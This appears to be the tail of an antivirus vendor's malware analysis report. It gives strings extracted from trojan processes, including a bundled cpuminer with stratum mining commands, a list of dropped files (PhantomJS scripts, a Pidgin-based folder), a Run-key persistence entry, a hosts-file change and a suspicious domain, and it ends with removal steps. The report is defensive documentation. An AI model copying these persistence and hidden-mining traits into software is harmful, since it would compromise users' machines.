t#SSSh
SSShp
SSShP
~)SSSh C
ttSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
dspdzkk.exe
ae.exe
ztvzeenmej.exe
a.okUk
.cXcAY
.mvKd=
D#.rz
1E\.UhKk
zcÁ
%Documents and Settings%\LocalService
|%System%\ztvzeenmej.exe
|tablefruit.net
WATCHDOGPROC "c:\windows\system32\dspdzkk.exe"
%System%\dspdzkk.exe
mscoree.dll
KERNEL32.DLL
ztvzeenmej.exe_1532:
.text
`.rdata
@.data
t%UVC
SQSSSh
~RSSSh`
j.hp7L
.hPQ;
tbSSSh
u-SSSh
t#SSSh
SSShp
SSShP
~)SSSh C
ttSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
dspdzkk.exe
ae.exe
ztvzeenmej.exe
a.okUk
.cXcAY
.mvKd=
D#.rz
1E\.UhKk
zcÁ
%Documents and Settings%\LocalService
%System%\ztvzeenmej.exe
mscoree.dll
KERNEL32.DLL
jr1yus5tfmq8ae.exe_3020:
.text
`.rdata
@.data
t%UVC
SQSSSh
~RSSSh`
j.hp7L
.hPQ;
tbSSSh
u-SSSh
t#SSSh
SSShp
SSShP
~)SSSh C
ttSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
dspdzkk.exe
ae.exe
ztvzeenmej.exe
a.okUk
.cXcAY
.mvKd=
D#.rz
1E\.UhKk
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\jr1yus5tfmq8ae.exe
mscoree.dll
KERNEL32.DLL
win32drkclient.exe_5456:
.text
``.data
.rdata
`@.bss
.idata
\\\\5\\\\
|$@3\$,3\$0
\$$!|$$!
|$ 1|$41
\$0#\$(1
|$\3|$81
\$\3\$`3
""""%""""1
1|$,1\$,
\$\3\$ 1|$(
\$43\$01
\$ 3\$41
1\$,1|$,
\$ 3\$(3\$8
|$03|$43|$@
|$,3|$83|$ 3|$
libgcj-13.dll
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
cpuminer 2.3.2
DEBUG: job_id='%s' extranonce2=%s ntime=x
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}{"method": "getwork", "params": [ "%s" ], "id":1}Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}#"! '&%$ *)(/.-,32107654;:98?>=<2
tXXFr.rh.44Aw-wl-66
r.rh.44Fw-wl-66A
.rh.44Fr-wl-66Aw
O9K\9..eKW
trh.44Fr.wl-66Aw-
K\9..eK9
h.44Fr.rl-66Aw-w
O\9..eK9K=W
.44Fr.rh-66Aw-wl
9..eK9K\W
t44Fr.rh.66Aw-wl-
..eK9K\9
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
7.35.0
smtp
tftp
getpeername() failed with errno %d: %s
getsockname() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Immediate connect fail for %s: %s
Couldn't bind to '%s'
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
[%s %s %s]
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
%s:%d
Hostname was %sfound in DNS cache
timeout on name lookup is not supported
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
IDN support not present, can't parse Unicode domains
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
[^:]:%[^
:]://%[^
malformed
SMTP.
Rebuilt URL to: %s
Protocol %s not supported or disabled in libcurl
%s://%s
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found bundle for host %s: %p
Server doesn't support pipelining
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with host %s
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
Curl_poll(%d ds, %d ms)
Internal error clearing splay node = %d
Internal error removing splay node = %d
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %I64d
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
%d.%d.%d.%d
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Please call curl_multi_perform() soon
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: unknown PASS reply
FTP: Accepting server connect has timed out
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Problem with the SSL CA cert (path? access rights?)
Error in the SSH layer
Issuer check against peer certificate failed
FTP: The server did not accept the PRET command.
Unable to parse FTP file list
0123456789
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
Curl_ipv4_resolve_r failed for %s
%sAuthorization: Basic %s
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
Chunky upload is not supported by HTTP 1.0
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
USER %s
PBSZ %d
Failure sending QUIT command: %s
ftp server doesn't support SIZE
RETR %s
Connect data stream passively
APPE %s
STOR %s
SIZE %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
socket failure: %s
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
%s %s
Failure sending PORT command: %s
Uploading to a URL without a file name!
FTPS not supported!
PASS %s
ACCT %s
Access denied: d
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Connecting to %s (%s) port %d
TYPE %c
MDTM %s
CWD %s
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
FTP response timeout
FTP response aborted due to select/poll error: %d
Preparing for accepting server on data port
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
AUTH %s
ACCT rejected by server: d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
PRET command not accepted: d
Failed to do PORT
RETR response: d
Failed FTP upload:
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
ftp_perform ends with SECONDARY: %d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
PORT
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
WS2_32.DLL
CLIENT libcurl 7.35.0
MATCH %s %s %s
DEFINE %s %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LDAP local: trying to establish %s connection
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
set timeouts for state %d; Total %ld, retry %d maxtry %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
bind() failed; %s
%s%c%s%c
tftp_send_first: internal error
TFTP finished
TFTP response timeout
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
TFTP
%cd
LIST "%s" *
FETCH %s BODY[%s]
LOGIN
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
IMAPS not supported!
Access denied: %d
APPEND %s (\Seen) {%I64d}SELECT %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
Authentication failed: %d
AUTH %s %s
POP3S not supported!
APOP %s %s
STLS not supported.
RCPT TO:%s
RCPT TO:<%s>
SMTPS not supported!
Got unexpected smtp-server response: %d
EHLO %s
HELO %s
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
SMTP
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%%X
xxxx
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
login
password
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is not blacklisted
Server %s is blacklisted
d:d:d
d:d
%c%c==
%c%c%c=
------------------------xx
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
.jpeg
.html
0123456789-
%s xxxxxxxxxxxxxxxx
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
user=%s
auth=Bearer %s
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
Assertion failed: (%s), file %s, line %d
M%p %d %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
C%p %d %s
C%p %d V=%0X B=%d b=%p w=%ld %s
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
jZGCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
PeekNamedPipe
_acmdln
_amsg_exit
ldap_msgfree
ADVAPI32.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
wldap32.dll
WS2_32.dll
"@"@"@"@
File: %ws, Line %u
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ztvzeenmej.exe:1532
jr1yus5tfepmae.exe:4792
purple.exe:6128
unzip.exe:6056
unzip.exe:5544
jr1yus5tfzmnae.exe:5420
jr1yus5tfaskaetbuftx.exe:2740
dspdzkk.exe:3736
dspdzkk.exe:4868
jr1yus5tfmq8ae.exe:3020
%original file name%.exe:232 - Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%System%\vqtzdvifamove\tst (10 bytes)
C:\dev\null\prefs.xml.save (7 bytes)
C:\dev\null\certificates\x509\tls_peers\login.yahoo.com.save (6 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Entrust.net_2048.pem (1 bytes)
%System%\vqtzdvifamove\purple\plugins\xmppconsole.dll (37 bytes)
%System%\vqtzdvifamove\purple\libnspr4.dll (1281 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Thawte_Primary_Root_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\libjabber.dll (2321 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslLOGIN.dll (601 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Deutsche_Telekom_Root_CA_2.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Thawte_Premium_Server_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\DigiCertHighAssuranceCA-3.pem (2 bytes)
%System%\vqtzdvifamove\purple\libxml2-2.dll (7971 bytes)
%System%\vqtzdvifamove\purple\libglib-2.0-0.dll (7726 bytes)
%System%\vqtzdvifamove\purple\ca-certs\DigiCertHighAssuranceEVRootCA.pem (1 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslPLAIN.dll (601 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_International_Server_Class_3_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Baltimore_CyberTrust_Root.pem (1 bytes)
%System%\vqtzdvifamove\purple\ssl3.dll (1281 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslCRAMMD5.dll (601 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5_2.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Equifax_Secure_Global_eBusiness_CA-1.pem (964 bytes)
%System%\vqtzdvifamove\purple\libgmodule-2.0-0.dll (36 bytes)
%System%\vqtzdvifamove\purple\purple.exe (25 bytes)
%System%\vqtzdvifamove\purple\nss3.dll (5873 bytes)
%System%\vqtzdvifamove\purple\ca-certs\America_Online_Root_Certification_Authority_1.pem (1 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslANONYMOUS.dll (601 bytes)
%System%\vqtzdvifamove\purple\sqlite3.dll (3073 bytes)
%System%\vqtzdvifamove\purple\ca-certs\GTE_CyberTrust_Global_Root.pem (876 bytes)
%System%\vqtzdvifamove\purple\libgcc_s_dw2-1.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\libyahoo.dll (22 bytes)
%System%\vqtzdvifamove\purple\libsasl.dll (673 bytes)
%System%\vqtzdvifamove\purple\smime3.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\statenotify.dll (15 bytes)
%System%\vqtzdvifamove\purple\ca-certs\ValiCert_Class_2_VA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G2.pem (1 bytes)
%System%\vqtzdvifamove\purple\softokn3.dll (673 bytes)
%System%\vqtzdvifamove\purple\ca-certs\CAcert_Root.pem (2 bytes)
%System%\vqtzdvifamove\purple\intl.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\ssl.dll (12 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class3_Extended_Validation_CA.pem (2 bytes)
%System%\vqtzdvifamove\purple\freebl3.dll (1425 bytes)
%System%\vqtzdvifamove\purple\plugins\ssl-nss.dll (28 bytes)
%System%\vqtzdvifamove\purple\zlib1.dll (673 bytes)
%System%\vqtzdvifamove\purple\libssp-0.dll (36 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Go_Daddy_Class_2_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\AddTrust_External_Root.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\CAcert_Class3.pem (2 bytes)
%System%\vqtzdvifamove\purple\ca-certs\AOL_Member_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\plugins\libxmpp.dll (21 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslDIGESTMD5.dll (673 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Entrust.net_Secure_Server_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\ca-certs\StartCom_Certification_Authority.pem (2 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Microsoft_Internet_Authority_2010.pem (1 bytes)
%System%\vqtzdvifamove\purple\nssutil3.dll (601 bytes)
%System%\vqtzdvifamove\purple\plugins\xmppdisco.dll (44 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Equifax_Secure_CA.pem (1 bytes)
%System%\vqtzdvifamove\purple\libgobject-2.0-0.dll (2105 bytes)
%System%\vqtzdvifamove\purple\libymsg.dll (1281 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Verisign_Class3_Primary_CA.pem (834 bytes)
%System%\vqtzdvifamove\purple\libplc4.dll (15 bytes)
%System%\vqtzdvifamove\purple\libplds4.dll (14 bytes)
%System%\vqtzdvifamove\purple\sasl2\saslGSSAPI.dll (36 bytes)
%System%\vqtzdvifamove\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem (1 bytes)
%System%\vqtzdvifamove\purple\libpurple.dll (5873 bytes)
%System%\vqtzdvifamove\purple\ca-certs\Microsoft_Secure_Server_Authority_2010.pem (2 bytes)
%System%\vqtzdvifamove\purple\libgthread-2.0-0.dll (44 bytes)
%System%\vqtzdvifamove\dropbox\clientutils.js (35 bytes)
%System%\vqtzdvifamove\dropbox\colorizer.js (4 bytes)
%System%\vqtzdvifamove\dropbox\bootstrap.js (14 bytes)
%System%\vqtzdvifamove\dropbox\casper.js (601 bytes)
%System%\vqtzdvifamove\dropbox\xunit.js (6 bytes)
%System%\vqtzdvifamove\dropbox\mouse.js (4 bytes)
%System%\vqtzdvifamove\dropbox\cli.js (5 bytes)
%System%\vqtzdvifamove\dropbox\dropbox2.js (25 bytes)
%System%\vqtzdvifamove\dropbox\querystring.js (5 bytes)
%System%\vqtzdvifamove\dropbox\utils.js (21 bytes)
%System%\vqtzdvifamove\dropbox\package.json (767 bytes)
%System%\vqtzdvifamove\dropbox\http.js (2 bytes)
%System%\vqtzdvifamove\dropbox\tester.js (59 bytes)
%System%\vqtzdvifamove\dropbox\pagestack.js (4 bytes)
%System%\vqtzdvifamove\dropbox\events.js (8 bytes)
%System%\vqtzdvifamove\dropbox\phantomjs197.exe (53130 bytes)
%System%\vqtzdvifamove\dropbox\googleTakeout.js (14 bytes)
%System%\dspdzkk.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\vqtzdvifamove\etc (10 bytes)
%WinDir%\Temp\jr1yus5tfzqkae.exe (1940 bytes)
%System%\vqtzdvifamove\rng (312 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%System%\unzip.exe (7100 bytes)
%System%\vqtzdvifamove\purple\purple.zip (90422 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\vqtzdvifamove\por (1 bytes)
%WinDir%\Temp\jr1yus5tfepmae.exe (35 bytes)
%System%\ztvzeenmej.exe (5873 bytes)
%System%\vqtzdvifamove\cfg (821 bytes)
%WinDir%\Temp\jr1yus5tfzmnae.exe (35 bytes)
%System%\vqtzdvifamove\ihst (164 bytes)
%System%\vqtzdvifamove\run (10 bytes)
%WinDir%\Temp\jr1yus5tfmq8ae.exe (5873 bytes)
%System%\vqtzdvifamove\dropbox\dropbox.zip (181699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jr1yus5tfaskaetbuftx.exe (3891 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AuthIP Procedure Presentation Office" = "%System%\dspdzkk.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.